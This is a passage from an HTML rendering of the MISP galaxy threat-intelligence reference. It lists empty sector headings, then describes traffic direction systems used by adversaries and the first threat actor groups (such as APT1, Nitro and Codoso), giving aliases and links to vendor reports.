<h3 id="_arts"><a class="anchor" href="#_arts"></a><a class="link" href="#_arts">Arts</a></h3>
</div>
<div class="sect2">
<h3 id="_bank"><a class="anchor" href="#_bank"></a><a class="link" href="#_bank">Bank</a></h3>
</div>
<div class="sect2">
<h3 id="_chemical"><a class="anchor" href="#_chemical"></a><a class="link" href="#_chemical">Chemical</a></h3>
</div>
<div class="sect2">
<h3 id="_citizens"><a class="anchor" href="#_citizens"></a><a class="link" href="#_citizens">Citizens</a></h3>
</div>
<div class="sect2">
<h3 id="_civil_aviation"><a class="anchor" href="#_civil_aviation"></a><a class="link" href="#_civil_aviation">Civil Aviation</a></h3>
</div>
<div class="sect2">
<h3 id="_country"><a class="anchor" href="#_country"></a><a class="link" href="#_country">Country</a></h3>
</div>
<div class="sect2">
<h3 id="_culture"><a class="anchor" href="#_culture"></a><a class="link" href="#_culture">Culture</a></h3>
</div>
<div class="sect2">
<h3 id="_data_broker"><a class="anchor" href="#_data_broker"></a><a class="link" href="#_data_broker">Data Broker</a></h3>
</div>
<div class="sect2">
<h3 id="_defense"><a class="anchor" href="#_defense"></a><a class="link" href="#_defense">Defense</a></h3>
</div>
<div class="sect2">
<h3 id="_development"><a class="anchor" href="#_development"></a><a class="link" href="#_development">Development</a></h3>
</div>
<div class="sect2">
<h3 id="_diplomacy"><a class="anchor" href="#_diplomacy"></a><a class="link" href="#_diplomacy">Diplomacy</a></h3>
</div>
<div class="sect2">
<h3 id="_education"><a class="anchor" href="#_education"></a><a class="link" href="#_education">Education</a></h3>
</div>
<div class="sect2">
<h3 id="_electric"><a class="anchor" href="#_electric"></a><a class="link" href="#_electric">Electric</a></h3>
</div>
<div class="sect2">
<h3 id="_electronic"><a class="anchor" href="#_electronic"></a><a class="link" href="#_electronic">Electronic</a></h3>
</div>
<div class="sect2">
<h3 id="_employment"><a class="anchor" href="#_employment"></a><a class="link" href="#_employment">Employment</a></h3>
</div>
<div class="sect2">
<h3 id="_energy"><a class="anchor" href="#_energy"></a><a class="link" href="#_energy">Energy</a></h3>
</div>
<div class="sect2">
<h3 id="_entertainment"><a class="anchor" href="#_entertainment"></a><a class="link" href="#_entertainment">Entertainment</a></h3>
</div>
<div class="sect2">
<h3 id="_environment"><a class="anchor" href="#_environment"></a><a class="link" href="#_environment">Environment</a></h3>
</div>
<div class="sect2">
<h3 id="_finance"><a class="anchor" href="#_finance"></a><a class="link" href="#_finance">Finance</a></h3>
</div>
<div class="sect2">
<h3 id="_food"><a class="anchor" href="#_food"></a><a class="link" href="#_food">Food</a></h3>
</div>
<div class="sect2">
<h3 id="_game"><a class="anchor" href="#_game"></a><a class="link" href="#_game">Game</a></h3>
</div>
<div class="sect2">
<h3 id="_gas"><a class="anchor" href="#_gas"></a><a class="link" href="#_gas">Gas</a></h3>
</div>
<div class="sect2">
<h3 id="_government_administration"><a class="anchor" href="#_government_administration"></a><a class="link" href="#_government_administration">Government, Administration</a></h3>
</div>
<div class="sect2">
<h3 id="_health"><a class="anchor" href="#_health"></a><a class="link" href="#_health">Health</a></h3>
</div>
<div class="sect2">
<h3 id="_higher_education"><a class="anchor" href="#_higher_education"></a><a class="link" href="#_higher_education">Higher education</a></h3>
</div>
<div class="sect2">
<h3 id="_hotels"><a class="anchor" href="#_hotels"></a><a class="link" href="#_hotels">Hotels</a></h3>
</div>
<div class="sect2">
<h3 id="_infrastructure"><a class="anchor" href="#_infrastructure"></a><a class="link" href="#_infrastructure">Infrastructure</a></h3>
</div>
<div class="sect2">
<h3 id="_intelligence"><a class="anchor" href="#_intelligence"></a><a class="link" href="#_intelligence">Intelligence</a></h3>
</div>
<div class="sect2">
<h3 id="_it"><a class="anchor" href="#_it"></a><a class="link" href="#_it">IT</a></h3>
</div>
<div class="sect2">
<h3 id="_it_hacker"><a class="anchor" href="#_it_hacker"></a><a class="link" href="#_it_hacker">IT - Hacker</a></h3>
</div>
<div class="sect2">
<h3 id="_it_isp"><a class="anchor" href="#_it_isp"></a><a class="link" href="#_it_isp">IT - ISP</a></h3>
</div>
<div class="sect2">
<h3 id="_it_security"><a class="anchor" href="#_it_security"></a><a class="link" href="#_it_security">IT - Security</a></h3>
</div>
<div class="sect2">
<h3 id="_justice"><a class="anchor" href="#_justice"></a><a class="link" href="#_justice">Justice</a></h3>
</div>
<div class="sect2">
<h3 id="_manufacturing"><a class="anchor" href="#_manufacturing"></a><a class="link" href="#_manufacturing">Manufacturing</a></h3>
</div>
<div class="sect2">
<h3 id="_maritime"><a class="anchor" href="#_maritime"></a><a class="link" href="#_maritime">Maritime</a></h3>
</div>
<div class="sect2">
<h3 id="_military"><a class="anchor" href="#_military"></a><a class="link" href="#_military">Military</a></h3>
</div>
<div class="sect2">
<h3 id="_multi_sector"><a class="anchor" href="#_multi_sector"></a><a class="link" href="#_multi_sector">Multi-sector</a></h3>
</div>
<div class="sect2">
<h3 id="_news_media"><a class="anchor" href="#_news_media"></a><a class="link" href="#_news_media">News - Media</a></h3>
</div>
<div class="sect2">
<h3 id="_ngo"><a class="anchor" href="#_ngo"></a><a class="link" href="#_ngo">NGO</a></h3>
</div>
<div class="sect2">
<h3 id="_oil"><a class="anchor" href="#_oil"></a><a class="link" href="#_oil">Oil</a></h3>
</div>
<div class="sect2">
<h3 id="_payment"><a class="anchor" href="#_payment"></a><a class="link" href="#_payment">Payment</a></h3>
</div>
<div class="sect2">
<h3 id="_pharmacy"><a class="anchor" href="#_pharmacy"></a><a class="link" href="#_pharmacy">Pharmacy</a></h3>
</div>
<div class="sect2">
<h3 id="_police_law_enforcement"><a class="anchor" href="#_police_law_enforcement"></a><a class="link" href="#_police_law_enforcement">Police - Law enforcement</a></h3>
</div>
<div class="sect2">
<h3 id="_research_innovation"><a class="anchor" href="#_research_innovation"></a><a class="link" href="#_research_innovation">Research - Innovation</a></h3>
</div>
<div class="sect2">
<h3 id="_satellite_navigation"><a class="anchor" href="#_satellite_navigation"></a><a class="link" href="#_satellite_navigation">Satellite navigation</a></h3>
</div>
<div class="sect2">
<h3 id="_security_systems"><a class="anchor" href="#_security_systems"></a><a class="link" href="#_security_systems">Security systems</a></h3>
</div>
<div class="sect2">
<h3 id="_social_networks"><a class="anchor" href="#_social_networks"></a><a class="link" href="#_social_networks">Social networks</a></h3>
</div>
<div class="sect2">
<h3 id="_space"><a class="anchor" href="#_space"></a><a class="link" href="#_space">Space</a></h3>
</div>
<div class="sect2">
<h3 id="_steel"><a class="anchor" href="#_steel"></a><a class="link" href="#_steel">Steel</a></h3>
</div>
<div class="sect2">
<h3 id="_telecoms"><a class="anchor" href="#_telecoms"></a><a class="link" href="#_telecoms">Telecoms</a></h3>
</div>
<div class="sect2">
<h3 id="_think_tanks"><a class="anchor" href="#_think_tanks"></a><a class="link" href="#_think_tanks">Think Tanks</a></h3>
</div>
<div class="sect2">
<h3 id="_trade"><a class="anchor" href="#_trade"></a><a class="link" href="#_trade">Trade</a></h3>
</div>
<div class="sect2">
<h3 id="_transport"><a class="anchor" href="#_transport"></a><a class="link" href="#_transport">Transport</a></h3>
</div>
<div class="sect2">
<h3 id="_travel"><a class="anchor" href="#_travel"></a><a class="link" href="#_travel">Travel</a></h3>
</div>
<div class="sect2">
<h3 id="_turbine"><a class="anchor" href="#_turbine"></a><a class="link" href="#_turbine">Turbine</a></h3>
</div>
<div class="sect2">
<h3 id="_tourism"><a class="anchor" href="#_tourism"></a><a class="link" href="#_tourism">Tourism</a></h3>
</div>
<div class="sect2">
<h3 id="_life_science"><a class="anchor" href="#_life_science"></a><a class="link" href="#_life_science">Life science</a></h3>
</div>
<div class="sect2">
<h3 id="_biomedical"><a class="anchor" href="#_biomedical"></a><a class="link" href="#_biomedical">Biomedical</a></h3>
</div>
<div class="sect2">
<h3 id="_high_tech"><a class="anchor" href="#_high_tech"></a><a class="link" href="#_high_tech">High tech</a></h3>
</div>
<div class="sect2">
<h3 id="_opposition"><a class="anchor" href="#_opposition"></a><a class="link" href="#_opposition">Opposition</a></h3>
</div>
<div class="sect2">
<h3 id="_political_party"><a class="anchor" href="#_political_party"></a><a class="link" href="#_political_party">Political party</a></h3>
</div>
<div class="sect2">
<h3 id="_hospitality"><a class="anchor" href="#_hospitality"></a><a class="link" href="#_hospitality">Hospitality</a></h3>
</div>
<div class="sect2">
<h3 id="_automotive"><a class="anchor" href="#_automotive"></a><a class="link" href="#_automotive">Automotive</a></h3>
</div>
<div class="sect2">
<h3 id="_metal"><a class="anchor" href="#_metal"></a><a class="link" href="#_metal">Metal</a></h3>
</div>
<div class="sect2">
<h3 id="_railway"><a class="anchor" href="#_railway"></a><a class="link" href="#_railway">Railway</a></h3>
</div>
<div class="sect2">
<h3 id="_water"><a class="anchor" href="#_water"></a><a class="link" href="#_water">Water</a></h3>
</div>
<div class="sect2">
<h3 id="_smart_meter"><a class="anchor" href="#_smart_meter"></a><a class="link" href="#_smart_meter">Smart meter</a></h3>
</div>
<div class="sect2">
<h3 id="_retai"><a class="anchor" href="#_retai"></a><a class="link" href="#_retai">Retai</a></h3>
</div>
<div class="sect2">
<h3 id="_retail"><a class="anchor" href="#_retail"></a><a class="link" href="#_retail">Retail</a></h3>
</div>
<div class="sect2">
<h3 id="_technology"><a class="anchor" href="#_technology"></a><a class="link" href="#_technology">Technology</a></h3>
</div>
<div class="sect2">
<h3 id="_engineering"><a class="anchor" href="#_engineering"></a><a class="link" href="#_engineering">engineering</a></h3>
</div>
<div class="sect2">
<h3 id="_mining"><a class="anchor" href="#_mining"></a><a class="link" href="#_mining">Mining</a></h3>
</div>
<div class="sect2">
<h3 id="_sport_2"><a class="anchor" href="#_sport_2"></a><a class="link" href="#_sport_2">Sport</a></h3>
</div>
<div class="sect2">
<h3 id="_restaurant"><a class="anchor" href="#_restaurant"></a><a class="link" href="#_restaurant">Restaurant</a></h3>
</div>
<div class="sect2">
<h3 id="_semi_conductors"><a class="anchor" href="#_semi_conductors"></a><a class="link" href="#_semi_conductors">Semi-conductors</a></h3>
</div>
<div class="sect2">
<h3 id="_insurance"><a class="anchor" href="#_insurance"></a><a class="link" href="#_insurance">Insurance</a></h3>
</div>
<div class="sect2">
<h3 id="_legal"><a class="anchor" href="#_legal"></a><a class="link" href="#_legal">Legal</a></h3>
</div>
<div class="sect2">
<h3 id="_shipping"><a class="anchor" href="#_shipping"></a><a class="link" href="#_shipping">Shipping</a></h3>
</div>
<div class="sect2">
<h3 id="_logistic"><a class="anchor" href="#_logistic"></a><a class="link" href="#_logistic">Logistic</a></h3>
</div>
<div class="sect2">
<h3 id="_construction"><a class="anchor" href="#_construction"></a><a class="link" href="#_construction">Construction</a></h3>
</div>
<div class="sect2">
<h3 id="_industrial"><a class="anchor" href="#_industrial"></a><a class="link" href="#_industrial">Industrial</a></h3>
</div>
<div class="sect2">
<h3 id="_communication_equipment"><a class="anchor" href="#_communication_equipment"></a><a class="link" href="#_communication_equipment">Communication equipment</a></h3>
</div>
<div class="sect2">
<h3 id="_security_service"><a class="anchor" href="#_security_service"></a><a class="link" href="#_security_service">Security Service</a></h3>
</div>
<div class="sect2">
<h3 id="_tax_firm"><a class="anchor" href="#_tax_firm"></a><a class="link" href="#_tax_firm">Tax firm</a></h3>
</div>
<div class="sect2">
<h3 id="_television_broadcast"><a class="anchor" href="#_television_broadcast"></a><a class="link" href="#_television_broadcast">Television broadcast</a></h3>
</div>
<div class="sect2">
<h3 id="_separatists"><a class="anchor" href="#_separatists"></a><a class="link" href="#_separatists">Separatists</a></h3>
</div>
<div class="sect2">
<h3 id="_dissidents"><a class="anchor" href="#_dissidents"></a><a class="link" href="#_dissidents">Dissidents</a></h3>
</div>
<div class="sect2">
<h3 id="_digital_services"><a class="anchor" href="#_digital_services"></a><a class="link" href="#_digital_services">Digital services</a></h3>
</div>
<div class="sect2">
<h3 id="_digital_infrastructure"><a class="anchor" href="#_digital_infrastructure"></a><a class="link" href="#_digital_infrastructure">Digital infrastructure</a></h3>
</div>
<div class="sect2">
<h3 id="_security_actors"><a class="anchor" href="#_security_actors"></a><a class="link" href="#_security_actors">Security actors</a></h3>
</div>
<div class="sect2">
<h3 id="_ecommerce"><a class="anchor" href="#_ecommerce"></a><a class="link" href="#_ecommerce">eCommerce</a></h3>
</div>
<div class="sect2">
<h3 id="_islamic_forums"><a class="anchor" href="#_islamic_forums"></a><a class="link" href="#_islamic_forums">Islamic forums</a></h3>
</div>
<div class="sect2">
<h3 id="_journalist"><a class="anchor" href="#_journalist"></a><a class="link" href="#_journalist">Journalist</a></h3>
</div>
<div class="sect2">
<h3 id="_streaming_service"><a class="anchor" href="#_streaming_service"></a><a class="link" href="#_streaming_service">Streaming service</a></h3>
</div>
<div class="sect2">
<h3 id="_puplishing_industry"><a class="anchor" href="#_puplishing_industry"></a><a class="link" href="#_puplishing_industry">Puplishing industry</a></h3>
</div>
<div class="sect2">
<h3 id="_publishing_industry"><a class="anchor" href="#_publishing_industry"></a><a class="link" href="#_publishing_industry">Publishing industry</a></h3>
</div>
<div class="sect2">
<h3 id="_islamic_organisation"><a class="anchor" href="#_islamic_organisation"></a><a class="link" href="#_islamic_organisation">Islamic organisation</a></h3>
</div>
<div class="sect2">
<h3 id="_casino"><a class="anchor" href="#_casino"></a><a class="link" href="#_casino">Casino</a></h3>
</div>
<div class="sect2">
<h3 id="_consulting"><a class="anchor" href="#_consulting"></a><a class="link" href="#_consulting">Consulting</a></h3>
</div>
<div class="sect2">
<h3 id="_online_marketplace"><a class="anchor" href="#_online_marketplace"></a><a class="link" href="#_online_marketplace">Online marketplace</a></h3>
</div>
<div class="sect2">
<h3 id="_dns_service_provider"><a class="anchor" href="#_dns_service_provider"></a><a class="link" href="#_dns_service_provider">DNS service provider</a></h3>
</div>
<div class="sect2">
<h3 id="_veterinary"><a class="anchor" href="#_veterinary"></a><a class="link" href="#_veterinary">Veterinary</a></h3>
</div>
<div class="sect2">
<h3 id="_marketing"><a class="anchor" href="#_marketing"></a><a class="link" href="#_marketing">Marketing</a></h3>
</div>
<div class="sect2">
<h3 id="_video_sharing"><a class="anchor" href="#_video_sharing"></a><a class="link" href="#_video_sharing">Video Sharing</a></h3>
</div>
<div class="sect2">
<h3 id="_advertising"><a class="anchor" href="#_advertising"></a><a class="link" href="#_advertising">Advertising</a></h3>
</div>
<div class="sect2">
<h3 id="_investment"><a class="anchor" href="#_investment"></a><a class="link" href="#_investment">Investment</a></h3>
</div>
<div class="sect2">
<h3 id="_accounting"><a class="anchor" href="#_accounting"></a><a class="link" href="#_accounting">Accounting</a></h3>
</div>
<div class="sect2">
<h3 id="_programming"><a class="anchor" href="#_programming"></a><a class="link" href="#_programming">Programming</a></h3>
</div>
<div class="sect2">
<h3 id="_managed_services_provider"><a class="anchor" href="#_managed_services_provider"></a><a class="link" href="#_managed_services_provider">Managed Services Provider</a></h3>
</div>
<div class="sect2">
<h3 id="_lawyers"><a class="anchor" href="#_lawyers"></a><a class="link" href="#_lawyers">Lawyers</a></h3>
</div>
<div class="sect2">
<h3 id="_civil_society"><a class="anchor" href="#_civil_society"></a><a class="link" href="#_civil_society">Civil society</a></h3>
</div>
<div class="sect2">
<h3 id="_petrochemical"><a class="anchor" href="#_petrochemical"></a><a class="link" href="#_petrochemical">Petrochemical</a></h3>
</div>
<div class="sect2">
<h3 id="_immigration"><a class="anchor" href="#_immigration"></a><a class="link" href="#_immigration">Immigration</a></h3>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_tds"><a class="anchor" href="#_tds"></a><a class="link" href="#_tds">TDS</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>TDS is a list of Traffic Direction System used by adversaries.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
TDS is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/tds.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Kafeine</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_keitaro"><a class="anchor" href="#_keitaro"></a><a class="link" href="#_keitaro">Keitaro</a></h3>
<div class="paragraph">
<p>Keitaro TDS is among the mostly used TDS in drive by infection chains</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2360. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://keitarotds.com/">https://keitarotds.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blacktds"><a class="anchor" href="#_blacktds"></a><a class="link" href="#_blacktds">BlackTDS</a></h3>
<div class="paragraph">
<p>BlackTDS is mutualised TDS advertised underground since end of December 2017</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2361. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blacktds">.com/[https://blacktds[.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shadowtds"><a class="anchor" href="#_shadowtds"></a><a class="link" href="#_shadowtds">ShadowTDS</a></h3>
<div class="paragraph">
<p>ShadowTDS is advertised underground since 2016-02. It&#8217;s in fact more like a Social Engineering kit focused on Android and embedding a TDS</p>
</div>
</div>
<div class="sect2">
<h3 id="_sutra"><a class="anchor" href="#_sutra"></a><a class="link" href="#_sutra">Sutra</a></h3>
<div class="paragraph">
<p>Sutra TDS was dominant from 2012 till 2015</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2362. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://kytoon.com/sutra-tds.html">http://kytoon.com/sutra-tds.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_simpletds"><a class="anchor" href="#_simpletds"></a><a class="link" href="#_simpletds">SimpleTDS</a></h3>
<div class="paragraph">
<p>SimpleTDS is a basic open source TDS</p>
</div>
<div class="paragraph">
<p>SimpleTDS is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Stds</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2363. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://sourceforge.net/projects/simpletds/">https://sourceforge.net/projects/simpletds/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bosstds"><a class="anchor" href="#_bosstds"></a><a class="link" href="#_bosstds">BossTDS</a></h3>
<div class="paragraph">
<p>BossTDS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2364. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://bosstds.com/">http://bosstds.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blackhat_tds"><a class="anchor" href="#_blackhat_tds"></a><a class="link" href="#_blackhat_tds">BlackHat TDS</a></h3>
<div class="paragraph">
<p>BlackHat TDS is sold underground.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2365. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2014/04/meet-blackhat-tds.html">http://malware.dontneedcoffee.com/2014/04/meet-blackhat-tds.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_futuristic_tds"><a class="anchor" href="#_futuristic_tds"></a><a class="link" href="#_futuristic_tds">Futuristic TDS</a></h3>
<div class="paragraph">
<p>Futuristic TDS is the TDS component of BlackOS/CookieBomb/NorthTale Iframer</p>
</div>
</div>
<div class="sect2">
<h3 id="_orchid_tds"><a class="anchor" href="#_orchid_tds"></a><a class="link" href="#_orchid_tds">Orchid TDS</a></h3>
<div class="paragraph">
<p>Orchid TDS was sold underground. Rare usage</p>
</div>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_threat_actor"><a class="anchor" href="#_threat_actor"></a><a class="link" href="#_threat_actor">Threat actor</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign..</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Threat actor is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/threat" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/threat</a> actor.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Alexandre Dulaunoy - Florian Roth - Thomas Schreck - Timo Steffens - Various</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_comment_crew"><a class="anchor" href="#_comment_crew"></a><a class="link" href="#_comment_crew">Comment Crew</a></h3>
<div class="paragraph">
<p>PLA Unit 61398 (Chinese: 61398部队, Pinyin: 61398 bùduì) is the Military Unit Cover Designator (MUCD)[1] of a People&#8217;s Liberation Army advanced persistent threat unit that has been alleged to be a source of Chinese computer hacking attacks</p>
</div>
<div class="paragraph">
<p>Comment Crew is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Comment Panda</p>
</li>
<li>
<p>PLA Unit 61398</p>
</li>
<li>
<p>APT 1</p>
</li>
<li>
<p>APT1</p>
</li>
<li>
<p>Advanced Persistent Threat 1</p>
</li>
<li>
<p>Byzantine Candor</p>
</li>
<li>
<p>Group 3</p>
</li>
<li>
<p>TG-8223</p>
</li>
<li>
<p>Comment Group</p>
</li>
<li>
<p>Brown Fox</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2366. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/PLA_Unit_61398">https://en.wikipedia.org/wiki/PLA_Unit_61398</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf">http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_stalker_panda"><a class="anchor" href="#_stalker_panda"></a><a class="link" href="#_stalker_panda">Stalker Panda</a></h3>
</div>
<div class="sect2">
<h3 id="_nitro"><a class="anchor" href="#_nitro"></a><a class="link" href="#_nitro">Nitro</a></h3>
<div class="paragraph">
<p>These attackers were the subject of an extensive report by Symantec in 2011, which termed the attackers Nitro and stated: 'The goal of the attackers appears to be to collect intellectual property such as design documents, formulas, and manufacturing processes. In addition, the same attackers appear to have a lengthy operation history including attacks on other industries and organizations. Attacks on the chemical industry are merely their latest attack wave. As part of our investigations, we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks.' Palo Alto Networks reported on continued activity by the attackers in 2014.</p>
</div>
<div class="paragraph">
<p>Nitro is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Covert Grove</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2367. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_nitro_attacks.pdf">http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_nitro_attacks.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_codoso"><a class="anchor" href="#_codoso"></a><a class="link" href="#_codoso">Codoso</a></h3>
<div class="paragraph">
<p>The New York Times described Codoso as: 'A collection of hackers for hire that the security industry has been tracking for years. Over the years, the group has breached banks, law firms and tech companies, and once hijacked the Forbes website to try to infect visitors computers with malware.'</p>
</div>
<div class="paragraph">
<p>Codoso is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>C0d0so</p>
</li>
<li>
<p>APT19</p>
</li>
<li>
<p>APT 19</p>
</li>
<li>
<p>Sunshop Group</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2368. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks">https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.isightpartners.com/2015/02/codoso/#sthash.VJMDVPQB.dpuf">http://www.isightpartners.com/2015/02/codoso/#sthash.VJMDVPQB.dpuf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/">http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nytimes.com/2016/06/12/technology/the-chinese-hackers-in-the-back-office.html">https://www.nytimes.com/2016/06/12/technology/the-chinese-hackers-in-the-back-office.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dust_storm_2"><a class="anchor" href="#_dust_storm_2"></a><a class="link" href="#_dust_storm_2">Dust Storm</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2369. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/Op_Dust_Storm_Report.pdf">https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/Op_Dust_Storm_Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_karma_panda"><a class="anchor" href="#_karma_panda"></a><a class="link" href="#_karma_panda">Karma Panda</a></h3>
<div class="paragraph">
<p>Adversary targeting dissident groups in China and its surroundings.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2370. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf">http://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_keyhole_panda"><a class="anchor" href="#_keyhole_panda"></a><a class="link" href="#_keyhole_panda">Keyhole Panda</a></h3>
<div class="paragraph">
<p>Keyhole Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>temp.bottle</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_wet_panda"><a class="anchor" href="#_wet_panda"></a><a class="link" href="#_wet_panda">Wet Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2371. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf">http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_foxy_panda"><a class="anchor" href="#_foxy_panda"></a><a class="link" href="#_foxy_panda">Foxy Panda</a></h3>
<div class="paragraph">
<p>Adversary group targeting telecommunication and technology organizations.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2372. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
